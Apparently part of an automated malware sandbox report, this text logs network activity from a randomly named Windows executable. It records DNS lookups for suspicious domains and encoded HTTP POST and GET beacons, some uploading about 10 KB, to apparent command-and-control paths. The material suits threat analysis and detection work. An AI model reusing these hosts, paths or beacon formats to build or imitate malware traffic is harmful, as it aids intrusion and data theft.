                      Sep 22, 2024 18:04:15.610538960 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610553026 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610761881 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610796928 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610812902 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610991955 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:16.345988989 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:16.346173048 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:16.346223116 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:17.108011961 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.125699043 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.259583950 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:18.259680986 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.267949104 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.273495913 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:19.030797958 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:19.032279015 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:19.036132097 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:19.040055990 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:19.044955969 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:24.255525112 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:24.281673908 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:24.281744957 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:24.297266960 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:24.317564011 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260416985 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260729074 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260740042 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260844946 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:25.261538029 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.261547089 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.261559963 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.261625051 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:25.261625051 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:25.812207937 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.838787079 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.844306946 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:26.844592094 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.854497910 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.859433889 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.533940077 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534173965 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534192085 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534231901 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:27.534605980 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534616947 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534687996 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:28.356008053 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.374455929 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.379312992 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.380081892 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.391489029 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.396368980 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396390915 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396394968 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396451950 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396456003 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396543980 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396548033 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396559000 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396586895 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.089948893 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090130091 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090140104 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090177059 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:30.090668917 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090706110 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:30.226382017 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.226443052 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:30.903126955 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.922801971 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.929419994 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:31.932044029 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.940951109 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.950659990 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644238949 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644359112 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644376993 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644463062 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.645004988 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.645026922 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.645056963 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.645962954 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.645987034 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.646011114 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.647017956 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647046089 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647063971 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647080898 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.647111893 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647166014 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.651544094 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.656508923 CEST8049765194.58.112.174192.168.2.4
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Sep 22, 2024 18:02:24.015682936 CEST | 1.1.1.1 | 192.168.2.4 | 0xb62d | No error (0) | www.tmstore.click | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 22, 2024 18:02:24.015682936 CEST | 1.1.1.1 | 192.168.2.4 | 0xb62d | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:02:24.015682936 CEST | 1.1.1.1 | 192.168.2.4 | 0xb62d | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:02:24.015682936 CEST | 1.1.1.1 | 192.168.2.4 | 0xb62d | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:02:40.552324057 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d3b | No error (0) | www.wdeb18.top | wdeb18.top |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 22, 2024 18:02:40.552324057 CEST | 1.1.1.1 | 192.168.2.4 | 0x1d3b | No error (0) | wdeb18.top |  | 206.119.82.147 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:02:54.689343929 CEST | 1.1.1.1 | 192.168.2.4 | 0xeab | No error (0) | www.2bhp.com |  | 81.88.63.46 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:03:08.533554077 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf3a | No error (0) | www.uburn.xyz |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:03:21.979671955 CEST | 1.1.1.1 | 192.168.2.4 | 0x89af | No error (0) | www.sppsuperplast.online | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 22, 2024 18:03:21.979671955 CEST | 1.1.1.1 | 192.168.2.4 | 0x89af | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 22, 2024 18:03:21.979671955 CEST | 1.1.1.1 | 192.168.2.4 | 0x89af | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:03:35.676214933 CEST | 1.1.1.1 | 192.168.2.4 | 0x3167 | No error (0) | www.palcoconnector.net |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:04:10.472779036 CEST | 1.1.1.1 | 192.168.2.4 | 0xa8fd | No error (0) | www.trapkitten.website |  | 195.161.68.8 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:04:24.251964092 CEST | 1.1.1.1 | 192.168.2.4 | 0x9ca6 | No error (0) | www.albero-dveri.online |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                      Sep 22, 2024 18:04:38.850117922 CEST | 1.1.1.1 | 192.168.2.4 | 0x885a | No error (0) | www.tempatmudisini01.click | tempatmudisini01.click |  | CNAME (Canonical name) | IN (0x0001) | false
                      Sep 22, 2024 18:04:38.850117922 CEST | 1.1.1.1 | 192.168.2.4 | 0x885a | No error (0) | tempatmudisini01.click |  | 103.21.221.4 | A (IP address) | IN (0x0001) | false
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49736 | 54.179.173.60 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:24.047411919 CEST | 479 | OUT | GET /pk64/?4rl8h=D2L+4j8Jfvzl8MUfQ9khdgsUc3RmXuRTEOKFuX1NYvsOSSQcePjFDW5WJ5RMGSKYSsEK0HwMz36kWpHuw/f75AJHHPht/yIbLRYuc71CiG5Lg6cOqhMe3mM=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.tmstore.click
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:02:25.043641090 CEST | 509 | IN | HTTP/1.1 301 Moved Permanently
                      Server: openresty
                      Date: Sun, 22 Sep 2024 16:02:24 GMT
                      Content-Type: text/html
                      Content-Length: 166
                      Connection: close
                      Location: https://www.tmstore.click/pk64/?4rl8h=D2L+4j8Jfvzl8MUfQ9khdgsUc3RmXuRTEOKFuX1NYvsOSSQcePjFDW5WJ5RMGSKYSsEK0HwMz36kWpHuw/f75AJHHPht/yIbLRYuc71CiG5Lg6cOqhMe3mM=&CfmHC=h4QXpn780jb
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49738 | 206.119.82.147 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:40.616561890 CEST | 734 | OUT | POST /66vh/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.wdeb18.top
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.wdeb18.top
                      Referer: http://www.wdeb18.top/66vh/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=pZFR7XUxJ/cK0+SPfQHpwmZcnOwRPBz4proZcA94HY+pJ2kks79GubirPItAEM80E7PO/ualRvjwEs6vdTuvLEw9AyfOSLbRuQt3X1dygXjDKtoKXJc5mDmBd0Xd6y1OC5+TZDQ1pPrtV8BarrEW4R2pHK2u5mtPPSWz8RMJVs6TKPKoRpshYrPo4jO+Qsw9gg==
                      Sep 22, 2024 18:02:41.546281099 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:41 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49739 | 206.119.82.147 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:43.214030027 CEST | 754 | OUT | POST /66vh/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.wdeb18.top
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.wdeb18.top
                      Referer: http://www.wdeb18.top/66vh/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=pZFR7XUxJ/cK1aWPczfp2GZf++wRFhz8prsZcFdoHqapJTIkt+RGtbirXYtZAM8jE7z8/umlRvHwEsqvciusLUw7MSfQWLbRuQt3X1JIgX7DNcYKWso49jmONkXdtC1CC5+6ZHQfpNjtV9xar6EVhh2rJq3R4l8bXDTe9AI2WOmuCpbyAYN2KrrblkHKdvN07uX6jLIVzIdJopNWbZq8mao=
                      Sep 22, 2024 18:02:44.192863941 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:44 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.4 | 49740 | 206.119.82.147 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:45.786467075 CEST | 10836 | OUT | POST /66vh/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.wdeb18.top
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.wdeb18.top
                      Referer: http://www.wdeb18.top/66vh/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:02:47.033452034 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:46 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.4 | 49741 | 206.119.82.147 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:48.338900089 CEST | 476 | OUT | GET /66vh/?4rl8h=kbtx4jUoEeJqru/eYSGX4Vxi+vYrNV7S+715NBpuIdmHZ1xIlp9jyY2cSJRvQOMSNpijnqr9Yv3PN/2sQDysWmAbAiXLeLXP7wBnaxk7t3LbEP86e95cii4=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.wdeb18.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:02:49.600567102 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:49 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Sep 22, 2024 18:02:49.603137016 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:49 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.4 | 49742 | 81.88.63.46 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:54.717338085 CEST | 728 | OUT | POST /znmp/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.2bhp.com
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.2bhp.com
                      Referer: http://www.2bhp.com/znmp/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=IJM1DHDU+xE4GMKvWKhJ2C7y7GdWOP5mTDV3i9N8p6P/o4WuEJZLgvl0JasC96fSJnUBh2XWHos0OsvIIabdIflRXnRLMUmqvBTWgVAgt0YPf+2mZaXehqf4x8Qgy3RIrfQVyIAjM+WwJ1LKx+7S7Oo9u6THxG4CkjNNFdWVhs5bPSjVcnEVJmgBUAASNZLfvw==
                      Sep 22, 2024 18:02:55.418658018 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:02:55 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.4 | 49743 | 81.88.63.46 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:57.311199903 CEST | 748 | OUT | POST /znmp/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.2bhp.com
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.2bhp.com
                      Referer: http://www.2bhp.com/znmp/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=IJM1DHDU+xE4Hs6vUpJJ9C6Ai2dWAf5iTDZ3i9lspMX/odquFMtLzfl0B6sDiKfZJmp0h37WHoI0OtfIJqnSIPlpO3RJB0mqvBTWgVUat1wPfOqmY5Pd9af5mMQg23RMrfQryNkJM8+wJ07Kyv7VxOo7jaSy7lhZthIeGPmx/vZnOUyPNWlCbmEyJHJmAa2W067V9l5IMmWl/7AqhDSQqws=
                      Sep 22, 2024 18:02:57.967808008 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:02:57 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.4 | 49744 | 81.88.63.46 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:02:59.863231897 CEST | 10830 | OUT | POST /znmp/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.2bhp.com
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.2bhp.com
                      Referer: http://www.2bhp.com/znmp/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:00.520443916 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:00 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.4 | 49745 | 81.88.63.46 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:02.689162970 CEST | 474 | OUT | GET /znmp/?4rl8h=FLkVAxn7xj4ld/LvMrFB+iyX7UR4Kb9aE0AH2N1ZkKvu5bquFbdTibpxDosPiJzFKWZ1tBPnHLgAGvmlA5vrecd2eGdXAGmup0nokTlXrk0eb8OdUo3hkYI=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.2bhp.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:03.364600897 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:03 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.4 | 49746 | 67.223.117.189 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:08.550878048 CEST | 731 | OUT | POST /unks/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.uburn.xyz
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.uburn.xyz
                      Referer: http://www.uburn.xyz/unks/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=RfJp1+tCLcajcnkKPrxtRAjg79pP+FERWaLGI3wpOb8bL9OCB04qMOx38lakj0WdygYzh+7My8Z10S7x2NB8RGytAdQG2PazN/fepBo20O4ld/Yb/xuUOgrmeD3qWUEdLF+Y8w4kRaC2iptJ/EbYRyggYED4AGTPgpi+kGqHq+STnQhXoYuw7leWNo/pOhZIPg==
                      Sep 22, 2024 18:03:09.133240938 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:09 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.4 | 49747 | 67.223.117.189 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:11.097505093 CEST | 751 | OUT | POST /unks/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.uburn.xyz
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.uburn.xyz
                      Referer: http://www.uburn.xyz/unks/
